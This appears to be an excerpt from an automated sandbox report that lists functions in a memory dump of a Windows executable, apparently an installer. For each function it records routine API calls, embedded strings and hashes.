Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
API String ID: 1452528299-4018462623
Opcode ID: 8277f76814eebddb6cd855b685f848118927478baab101f731a2c5473a35e58f
Instruction ID: 4732e12b7feb62cba89bc12bd1e010d33dda82644ead93823c63fd82ca6c9d4a
Opcode Fuzzy Hash: 8277f76814eebddb6cd855b685f848118927478baab101f731a2c5473a35e58f
Instruction Fuzzy Hash: A121A070A043085FCB01DFAAC8916AEBBF4EF49314F50416BF514E3382DA789E45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00435C44, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00435C9A
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00435CAF
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00435CB9
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004341AB,00000000,00434237), ref: 00435CDD
ReleaseDC.USER32 ref: 00435CE8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: 1fb7bcc4418045507bcbef6190e711986303ca9f2eda62e36956f3bc8fc0846a
Instruction ID: 79c8f7aab788e8a915c0d4527913d293c6a33452246558e417e50af7672ca098
Opcode Fuzzy Hash: 1fb7bcc4418045507bcbef6190e711986303ca9f2eda62e36956f3bc8fc0846a
Instruction Fuzzy Hash: 0211AF21600B999ADB20AF2589457AB37D0AB08759F00312BFC409A6D2D7B88D90C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00432FAC, Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00432FC4
GetDeviceCaps.GDI32(?,00000068), ref: 00432FE0
GetPaletteEntries.GDI32(8308077E,00000000,00000008,?), ref: 00432FF8
GetPaletteEntries.GDI32(8308077E,00000008,00000008,?), ref: 00433010
ReleaseDC.USER32 ref: 0043302C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: e7a1ce26c815af519e51ed66510900fe43fe160fd3092e6ea61e0ec364eea3f2
Instruction ID: a56531118d9863fb10815c96dd6a611ba491c04187801057ef52dd939134cfbc
Opcode Fuzzy Hash: e7a1ce26c815af519e51ed66510900fe43fe160fd3092e6ea61e0ec364eea3f2
Instruction Fuzzy Hash: A7116B715483407EFB04CFA9CC42F6E77ACE748718F10806BF140DA1C2C97A5904C725

Uniqueness

Uniqueness Score: -1.00%

Function 0041124C, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,004112E3,?,?,00000000), ref: 00411264

Part of subcall function 00410FC0: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00410FDE

GetThreadLocale.KERNEL32(00000000,00000004,00000000,004112E3,?,?,00000000), ref: 00411294
EnumCalendarInfoW.KERNEL32(Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 0041129F
GetThreadLocale.KERNEL32(00000000,00000003,Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 004112BD
EnumCalendarInfoW.KERNEL32(Function_000111D4,00000000,00000000,00000003,Function_00011198,00000000,00000000,00000004,00000000,004112E3,?,?,00000000), ref: 004112C8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: c03cbbab021a088dcf241721cd7fa43820a36a10f1099d416169162be8708c08
Instruction ID: 71e337b8903215346f0d11bd996a580e686b1bae27cfd0822ec513da61ab7c51
Opcode Fuzzy Hash: c03cbbab021a088dcf241721cd7fa43820a36a10f1099d416169162be8708c08
Instruction Fuzzy Hash: E101F7716041087BE701E7A5CC13FAE7258DB46718F6105B7FA00F66E5DA7C9E4182AC

Uniqueness

Uniqueness Score: -1.00%

Function 0047A614, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 0047A623
SetEvent.KERNEL32(00000000,0047D5B6,00000000,0047C13F,?,00000000,?,00000001,0047C345,?,00000000,00000200,0000020A,00000001), ref: 0047A63E
GetCurrentThreadId.KERNEL32 ref: 0047A643
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0047D5B6,00000000,0047C13F,?,00000000,?,00000001,0047C345,?,00000000,00000200,0000020A,00000001), ref: 0047A658
CloseHandle.KERNEL32(00000000,00000000,0047D5B6,00000000,0047C13F,?,00000000,?,00000001,0047C345,?,00000000,00000200,0000020A,00000001), ref: 0047A663

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: d582f4e2350e490901eed3532c878102242bf58a5146d67870b9ad78cc2ee91f
Instruction ID: fdb1547cf2729da18b8a49f4eb24dcedda4dc54bb5e6cab3409386dad74de87f
Opcode Fuzzy Hash: d582f4e2350e490901eed3532c878102242bf58a5146d67870b9ad78cc2ee91f
Instruction Fuzzy Hash: B9F03071511280DAF710EBB9ECDAA4E33A8A365304F08492AB318E32E1C7389858EB15

Uniqueness

Uniqueness Score: -1.00%

Function 0040D850, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 249shareCOMMON

Download Yara Rule

APIs

WNetGetUniversalNameW.MPR(00000000,00000001,?,00000400), ref: 0040D8C0
WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 0040D9C6
WNetEnumResourceW.MPR(?,FFFFFFFF,?,?), ref: 0040DA1E

Strings

Z, xrefs: 0040D921

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 73dab4456253812b7359efbba28692fbe416c6847636f4448538d0e4d2fe57dc
Instruction ID: 190c6ed948e2d57fd130db97bf6bd7a8798f98241d9fad51eb2170363c6e3541
Opcode Fuzzy Hash: 73dab4456253812b7359efbba28692fbe416c6847636f4448538d0e4d2fe57dc
Instruction Fuzzy Hash: B1A14C70E00209DBCF10EFA9C941AEEB7B5EF48304F11417AE401B7295D778AE89DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411300, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,00411533,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041133B

Part of subcall function 00410FC0: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00410FDE

Strings

ggg, xrefs: 0041145A
yyyy, xrefs: 0041146A
eeee, xrefs: 00411486

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 8e6b5ccbfcd17d1edf2c889ba857530c577b4f58f79652f87ebcdea3edc29d36
Instruction ID: bc785bebb976542844e4eff0edc208da79edf864bec7e6377600377858c166f1
Opcode Fuzzy Hash: 8e6b5ccbfcd17d1edf2c889ba857530c577b4f58f79652f87ebcdea3edc29d36
Instruction Fuzzy Hash: 7651A931B001099BDB10EB69C5829EEB3B6DF80304B20847BEA12A73B5D73CDD96965D

Uniqueness

Uniqueness Score: -1.00%

Function 004A6D98, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 004A6E25
DrawTextW.USER32(00000000,00000000,?,?,00000D20), ref: 004A6E5A
DrawTextW.USER32(?,00000000,?,00000000,00000800), ref: 004A6EEC

Strings

, xrefs: 004A6E0A

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$EmptyRect
String ID:
API String ID: 182455014-2867612384
Opcode ID: a2ae6765dd0d0f12910ae12e7e76923114d7d8dc6f844ee9027fcbded5def904
Instruction ID: e781b6c8f7d3cf36b22da044480c0b30d82e40f8a015fbb439d0d9c2a877b3a4
Opcode Fuzzy Hash: a2ae6765dd0d0f12910ae12e7e76923114d7d8dc6f844ee9027fcbded5def904
Instruction Fuzzy Hash: D5519071A002089FDB10CFA9C8857EEBBF5FF59314F19447AE805A7252C778AA44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004B0A78, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetDiskFreeSpaceExW,00000000,004B0BC1), ref: 004B0AB1

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Strings

GetDiskFreeSpaceExW, xrefs: 004B0AA7
kernel32.dll, xrefs: 004B0AAC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 1646373207-1127948838
Opcode ID: c1e043c8253ff10d34c1658abe8dd9afdccb6a116e6bfe2e6d288f93909a21b2
Instruction ID: f17c09da845011f287a1b8d983794b1e0dfa65d8092af23d93cb9f6b5e720b4e
Opcode Fuzzy Hash: c1e043c8253ff10d34c1658abe8dd9afdccb6a116e6bfe2e6d288f93909a21b2
Instruction Fuzzy Hash: 38415171A04248AFCB01DFE6D882DDFBBB8EF49308F51896BF404B3251D6386905CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00481014, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0048103E
SelectObject.GDI32(?,00000000), ref: 00481061
ReleaseDC.USER32 ref: 00481147

Strings

...\, xrefs: 004810F9

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectReleaseSelect
String ID: ...\
API String ID: 1831053106-983595016
Opcode ID: dc94da87de19fab721221be243ba54b8e0c0972d4159a55adf79ecba08b9e71a
Instruction ID: 10013f02066f25e396424dd740e50138a856e717a50cd59f53b173ec13ea6c44
Opcode Fuzzy Hash: dc94da87de19fab721221be243ba54b8e0c0972d4159a55adf79ecba08b9e71a
Instruction Fuzzy Hash: FF315530A00148AFDF10EB9AC885B9EB7F9EF49304F1144BBF504A76A1D7789E45C759

Uniqueness

Uniqueness Score: -1.00%

Function 004AE0F8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,004AE233), ref: 004AE1E3
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,004AE233), ref: 004AE1F3

Strings

_iu, xrefs: 004AE185
.tmp, xrefs: 004AE197

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFileHandle
String ID: .tmp$_iu
API String ID: 3498533004-10593223
Opcode ID: 3ab97e3203bb585d6dd69769ec188c16cca2c896a5b71cf43bd72dfdea81e1db
Instruction ID: 1141767e252206f58913cfb5af5e94aeabfa58095550552472d484252e88840d
Opcode Fuzzy Hash: 3ab97e3203bb585d6dd69769ec188c16cca2c896a5b71cf43bd72dfdea81e1db
Instruction Fuzzy Hash: 3131C630E00259ABDB10EBA6C842BDEB7B4EF55308F1041AAF910773C1D73C6E018B69

Uniqueness

Uniqueness Score: -1.00%

Function 0047CF74, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103timethreadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0047CEE8: GetCursorPos.USER32 ref: 0047CEEF

SetTimer.USER32 ref: 0047D05F
GetCurrentThreadId.KERNEL32 ref: 0047D099
WaitMessage.USER32(00000000,0047D0DD,?,?,?,00000000), ref: 0047D0BD

Strings

<`P, xrefs: 0047D09E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorMessageThreadTimerWait
String ID: <`P
API String ID: 3909455694-3701931957
Opcode ID: f4f70071beb7e4e95dcf0a27aaed517e70c5bce775cc2c211ce9530fabb15181
Instruction ID: 8a2324f82086e794841398e0f77df9182ed64bd59ce6e2c4afa8b3a25305f202
Opcode Fuzzy Hash: f4f70071beb7e4e95dcf0a27aaed517e70c5bce775cc2c211ce9530fabb15181
Instruction Fuzzy Hash: EB418C70A14284DFEB11DB64C996BDE77F5EF05308F5080AAE40897291C378AE05DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004FE0BC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,004FE1BC,?,?,00000000,0050B17C,004FE609,?,00000000,00000000,00000000,004FE639,?,?), ref: 004FE12E
SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,004FE1BC,?,?,00000000,0050B17C,004FE609,?,00000000,00000000,00000000,004FE639), ref: 004FE157
MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,004FE1BC,?,?,00000000,0050B17C,004FE609,?,00000000,00000000,00000000), ref: 004FE170

Strings

isRS-%.3u.tmp, xrefs: 004FE10D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Attributes$Move
String ID: isRS-%.3u.tmp
API String ID: 3839737484-3657609586
Opcode ID: 75a38f12078c055da401d1afc42f780424b22e11fe9a0d66e53b884974dac955
Instruction ID: f8ee58a520a7c5bb2b90c5d473876677309a2cb4b7756861de9105c26de28572
Opcode Fuzzy Hash: 75a38f12078c055da401d1afc42f780424b22e11fe9a0d66e53b884974dac955
Instruction Fuzzy Hash: 8B316671D0021CAFDB04EBABC981AAFB7F8AF44318F11457BA915B32D1D7389E118659

Uniqueness

Uniqueness Score: -1.00%

Function 004FC462, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004FC4A2

Strings

tIP, xrefs: 004FC4F4
@, xrefs: 004FC468
/INITPROCWND=$%x , xrefs: 004FC4D2

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@$tIP
API String ID: 2353593579-1466394587
Opcode ID: 5a3090d5d6df7c067db1b6483952aec51dd1abef0c0a75641e7276f90bec72bf
Instruction ID: 097a1a9749d9a58b5b88eb059f00cb423dfd1d3c345555dca05a7dcadf53a222
Opcode Fuzzy Hash: 5a3090d5d6df7c067db1b6483952aec51dd1abef0c0a75641e7276f90bec72bf
Instruction Fuzzy Hash: 2921D131A0434C9FDB01EBA4D991ABEB7F8EB49304F50447AF604E3291C638A904CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004A64B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004A6484: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004A649C

LoadLibraryW.KERNEL32(00000000,00000000,004A6572,?,?,00000000,00000000), ref: 004A64FC

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000), ref: 00409666

Strings

LresultFromObject, xrefs: 004A6507
oleacc.dll, xrefs: 004A64E9
CreateStdAccessibleObject, xrefs: 004A6517

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
